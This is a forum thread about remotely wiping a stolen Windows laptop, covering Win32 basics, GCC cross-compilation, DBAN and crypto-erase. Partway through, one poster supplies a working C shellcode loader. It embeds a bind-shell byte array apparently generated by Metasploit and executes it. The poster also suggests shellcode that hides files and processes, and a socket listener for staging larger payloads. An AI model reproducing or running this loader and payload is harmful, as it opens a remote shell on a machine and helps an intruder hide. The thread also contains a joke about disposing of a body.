The laptop that was stolen has Windows on it, so Compaq posted code to be compiled to an executable file that will run on Windows.
Win32 refers to "Microsoft Windows 32-Bit"; you won't be able to get the library for Linux (and thankfully so).
The Win32 Application Programming Interface (API for short) is the set of functions that a Win32 function can use to do stuff in Windows. For instance, if I wanted to make a message box appear in Windows, I could call the "MessageBoxW" function, which is a part of the Win32 API.
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
There's probably a way to get dban to run on boot. It runs in memory, so once it's running it won't need the drive anymore. Though it's already been said, the info has probably been pulled already.
Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69
I understand all of that just fine, but I was under the impression that C code with winsock2.h and windows.h could still be compiled with GCC in order to run on a Windows machine. What I mean is, if I only had a *nix box and I wanted to compile this to upload to a Windows box, is there no way to do that in GCC? I understand it's a Windows executable.
OK, I'm with you
What you're referring to is known as "cross-compilation". Cross-compilation is where you use Computer Type A to compile a program that will run on Computer Type B. So for instance, if you compiled a Windows program using a compiler on a Linux machine, that would be cross-compilation.
The only cross-compilation I've ever done is using my laptop to compile a program for an 8-Bit microcontroller :P
Here's an excerpt from Wikipedia http://en.wikipedia.org/wiki/Cross-compiling:
"GCC, a free software collection of compilers, can be set up to cross compile. It supports many platforms and languages. However, due to limited volunteer time and the huge amount of work it takes to maintain working cross compilers, in many releases some of the cross compilers are broken."
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
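A quick way to see what a cross-compile actually produced is to read the output file's header: a GCC cross-compiler targeting Windows (MinGW-w64, for example) emits a PE image even when it runs on Linux, while the native compiler emits ELF. The checker below is an added example, not code from this thread; the function names and the sample header bytes are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: classify an executable image by its header bytes. */
typedef enum { FMT_UNKNOWN, FMT_ELF, FMT_PE_X86, FMT_PE_X64, FMT_PE_OTHER } exe_format;

exe_format classify_image(const uint8_t *buf, size_t len) {
    if (len >= 4 && memcmp(buf, "\x7f" "ELF", 4) == 0)
        return FMT_ELF;
    /* DOS header: "MZ", with the PE header offset (e_lfanew) at 0x3c. */
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return FMT_UNKNOWN;
    uint32_t off = (uint32_t)buf[0x3c] | (uint32_t)buf[0x3d] << 8 |
                   (uint32_t)buf[0x3e] << 16 | (uint32_t)buf[0x3f] << 24;
    /* Need "PE\0\0" (4 bytes) plus the Machine field (2 bytes) in bounds. */
    if (off > len || len - off < 6 || memcmp(buf + off, "PE\0\0", 4) != 0)
        return FMT_UNKNOWN;
    uint16_t machine = (uint16_t)(buf[off + 4] | buf[off + 5] << 8);
    if (machine == 0x014c) return FMT_PE_X86;  /* IMAGE_FILE_MACHINE_I386 */
    if (machine == 0x8664) return FMT_PE_X64;  /* IMAGE_FILE_MACHINE_AMD64 */
    return FMT_PE_OTHER;
}

/* Constructed sample: bare header bytes, not a real program. */
exe_format classify_sample_pe(uint16_t machine) {
    uint8_t img[0x100] = {0};
    img[0] = 'M'; img[1] = 'Z';
    img[0x3c] = 0x80;                      /* e_lfanew -> 0x80 */
    memcpy(img + 0x80, "PE\0\0", 4);
    img[0x84] = (uint8_t)(machine & 0xff);
    img[0x85] = (uint8_t)(machine >> 8);
    return classify_image(img, sizeof img);
}

int main(int argc, char **argv) {
    static const char *names[] = {"unknown", "ELF", "PE i386", "PE x86-64", "PE other"};
    uint8_t buf[4096];
    FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
    if (!f) {  /* no file given: fall back to the constructed sample */
        printf("sample: %s\n", names[classify_sample_pe(0x8664)]);
        return 0;
    }
    size_t n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    printf("%s: %s\n", argv[1], names[classify_image(buf, n)]);
    return 0;
}
```

Only the first 4096 bytes are read, so an image whose PE header sits beyond that offset is reported as unknown.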
The last line that loads the shellcode should (haven't tested) run in Linux with gcc. The couple of lines above don't need to be there, as the shellcode from Metasploit will initialize the sockets, but hiding the window with the top two lines is Windows only; I don't know the code for Linux (but they don't need to be there). Use shellcode for Linux and it should work.
linux code
Another note: if you set this up with a socket listener, you could ask for the attacker to send shellcode and get it to run larger shellcode, say if you can only use a small shellcode with the exploit.
Code:
#include <stdio.h>

/* get linux shell code */
unsigned char bindcode[] =
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
    "\x25\x78\x47\x83\xeb\xfc\xe2\xf4\x32\x4f\x93\x0a\x26\xdc\x87\xb8"
    "\x31\x45\xf3\x2b\xea\x01\xf3\x02\xf2\xae\x04\x42\xb6\x24\x97\xcc"
    "\x81\x3d\xf3\x18\xee\x24\x93\x0e\x45\x11\xf3\x46\x20\x14\xb8\xde"
    "\x62\xa1\xb8\x33\xc9\xe4\xb2\x4a\xcf\xe7\x93\xb3\xf5\x71\x5c\x6f"
    "\xbb\xc0\xf3\x18\xea\x24\x93\x21\x45\x29\x33\xcc\x91\x39\x79\xac"
    "\xcd\x09\xf3\xce\xa2\x01\x64\x26\x0d\x14\xa3\x23\x45\x66\x48\xcc"
    "\x8e\x29\xf3\x37\xd2\x88\xf3\x07\xc6\x7b\x10\xc9\x80\x2b\x94\x17"
    "\x31\xf3\x1e\x14\xa8\x4d\x4b\x75\xa6\x52\x0b\x75\x91\x71\x87\x97"
    "\xa6\xee\x95\xbb\xf5\x75\x87\x91\x91\xac\x9d\x21\x4f\xc8\x70\x45"
    "\x9b\x4f\x7a\xb8\x1e\x4d\xa1\x4e\x3b\x88\x2f\xb8\x18\x76\x2b\x14"
    "\x9d\x76\x3b\x14\x8d\x76\x87\x97\xa8\x4d\x7c\x05\xa8\x76\xf1\xa6"
    "\x5b\x4d\xdc\x5d\xbe\xe2\x2f\xb8\x18\x4f\x68\x16\x9b\xda\xa8\x2f"
    "\x6a\x88\x56\xae\x99\xda\xae\x14\x9b\xda\xa8\x2f\x2b\x6c\xfe\x0e"
    "\x99\xda\xae\x17\x9a\x71\x2d\xb8\x1e\xb6\x10\xa0\xb7\xe3\x01\x10"
    "\x31\xf3\x2d\xb8\x1e\x43\x12\x23\xa8\x4d\x1b\x2a\x47\xc0\x12\x17"
    "\x97\x0c\xb4\xce\x29\x4f\x3c\xce\x2c\x14\xb8\xb4\x64\xdb\x3a\x6a"
    "\x30\x67\x54\xd4\x43\x5f\x40\xec\x65\x8e\x10\x35\x30\x96\x6e\xb8"
    "\xbb\x61\x87\x91\x95\x72\x2a\x16\x9f\x74\x12\x46\x9f\x74\x2d\x16"
    "\x31\xf5\x10\xea\x17\x20\xb6\x14\x31\xf3\x12\xb8\x31\x12\x87\x97"
    "\x45\x72\x84\xc4\x0a\x41\x87\x91\x9c\xda\xa8\x2f\x3e\xaf\x7c\x18"
    "\x9d\xda\xae\xb8\x1e\x25\x78\x47";

int main()
{
    ((void (*)(void)) &bindcode)();
    /* the program will stay running when it loads bindcode, use shellcode that will hide files and process. */
}
Cool. Thanks for clearing it up.
Hi All,
I am not an expert in this area, but simple drive wipes might still be recoverable using disk forensic tools. Would it be feasible to encrypt the data in place and destroy the crypto key as an alternative?
Just an idea.
Since the data was already stored once in plain, unencrypted format, it would be just as recoverable after this as after simply being destroyed in the first place. Or actually, that is incorrect: as you are suggesting to simply destroy the encryption key, the actual data would still remain, and you would in addition have the option to brute-force the key to recover the data.
-Monkeys are like nature's humans.